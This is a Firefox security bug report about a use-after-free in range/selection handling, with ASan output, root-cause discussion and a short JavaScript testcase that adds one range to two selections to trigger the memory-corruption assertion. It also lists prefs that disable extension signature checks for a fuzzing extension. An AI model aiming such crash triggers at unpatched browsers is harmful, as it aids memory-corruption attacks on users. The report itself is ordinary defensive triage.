00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2080006000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c2080006010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==23032==ABORTING
Attached file ASAN output
Attached file crash.html
Group: core-security → dom-core-security
Is this the recent regression which is/was being fixed in some other bug.
Olli is thinking of bug 1396520. That was merged to mozilla-central on the same day as the buildid listed in comment 0, so I don't know whether the buildid from comment 0 has that fix. What is the actual revision the build from comment 0 is built from (see about:buildconfig)? That said, the fix for bug 1396520 should have fixed a null-deref, not a UAF. This bug is making it sound like "range" is UAF, which is why its IsInSelection() might be bogus... I'll try to reproduce this locally.
Flags: needinfo?(bzbarsky)
Hrm. Where do I get a current copy of the fuzzpriv extension? The ones at https://www.squarefree.com/extensions/domFuzzLite3.xpi claims to not be compatible with nightly...
Flags: needinfo?(nils)
[Tracking Requested - why for this release]: I _think_ I found the right extension. I also built an ASAN debug build, because I wasn't succeeding at reproducing. But I don't even get to the ASAN bits; I fail an assertion like so: Assertion failure: !aSelection || !mSelection, at /home/bzbarsky/mozilla/inbound/mozilla/dom/base/nsRange.cpp:1055 If that assertion fails, bad things will happen that used to not happen before the fix for bug 1395701. In particular, if this assertion fails that means we are already registered with our common ancestor (because mSelection is non-null). Now we will RegisterCommonAncestor _again_ with the same ancestor. That that used to do was re-add us to the hashset on the common ancestor, which was a no-op. But now it will try to add us to the linked list twice. What that means is that other things in the list will have pointers to us, but we won't have pointers back to them anymore. Then when we are removed from the selection we will remove ourselves from the list, but those dangling pointers will remain. And if we are now destroyed, they become UAF.
Blocks: 1395701
Has Regression Range: --- → yes
tracking-firefox57: --- → ?
Keywords: regression
Assignee: nobody → bzbarsky
Flags: needinfo?(bzbarsky)
FYI, Cătălin is working on a similar crash in bug 1399091.
So for what it's worth, the claimed invariant simply fails to hold, as far as I can tell, if one adds the same range to two different selections. But yes, the patches in bug 1399091 are along the lines of what I was thinking as far as a fix here.
Depends on: 1399091
Pretty minimal testcase that reproduces the assert, avoiding the checks we have to theoretically prevent this: <iframe></iframe> <script> onload = function() { var range = document.createRange(); range.selectNodeContents(document.documentElement) var sel1 = getSelection(); sel1.addRange(range); range.selectNodeContents(frames[0].document.documentElement) var sel2 = frames[0].getSelection(); sel2.addRange(range); } </script>
(In reply to Boris Zbarsky [:bz] (still digging out from vacation mail) from comment #5) > Hrm. Where do I get a current copy of the fuzzpriv extension? The ones at > https://www.squarefree.com/extensions/domFuzzLite3.xpi claims to not be > compatible with nightly... Boris, for future use the fuzzing team maintains a version at the following: https://github.com/MozillaSecurity/domfuzz/tree/master/dom/extension It does however, require special prefs to be loaded. I think the following are sufficient: user_pref("extensions.allow-non-mpc-extensions", true); user_pref("extensions.legacy.enabled", true); user_pref("xpinstall.signatures.required", false);
Thanks!
Flags: needinfo?(nils)
This is fixed on 57/58 now, right?
I just tried reproducing on trunk with a debug ASAN build and the attached testcase, and the assertion in nsRange::SetSelection that was left in place in bug 1399091 still fires. Catalin, Mats, given that we have known testcases that trigger that assertion, should it really be there? Is there a followup on making that assertion hold? That said, I don't have an opt ASAN build on hand; it's possible that in an opt build bug 1399091 does in fact fix this...
Flags: needinfo?(nils)
Actually, I dug up an opt asan build. It does not fail on the testcase in this bug. Then I disabled the code added in bug 1399091 and I get a nice ASAN failure. So yes, this is fixed, for opt builds, by the patches in bug 1399091. Catalin, Mats, I still have the assertion question from comment 13.
Status: NEW → RESOLVED
Closed: 8 years ago
status-firefox57: affectedfixed
status-firefox58: --- → fixed
Flags: needinfo?(nils)
Flags: needinfo?(mats)
Flags: needinfo?(catalin.badea392)
Resolution: --- → FIXED
Target Milestone: --- → mozilla58
(In reply to Boris Zbarsky [:bz] (still digging out from vacation mail) from comment #14) > Actually, I dug up an opt asan build. It does not fail on the testcase in > this bug. Then I disabled the code added in bug 1399091 and I get a nice > ASAN failure. > > So yes, this is fixed, for opt builds, by the patches in bug 1399091. > > Catalin, Mats, I still have the assertion question from comment 13. That's going to be fixed in bug 1403145. I'll get to it tomorrow.
Flags: needinfo?(mats)
Flags: needinfo?(catalin.badea392)
Group: dom-core-security → core-security-release
Flags: sec-bounty?
Depends on: 1403145
Flags: sec-bounty? → sec-bounty-
Resolution: FIXED → DUPLICATE
Whiteboard: [sec aspect a dupe of 1399091, assertion fixed in 1403145]
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: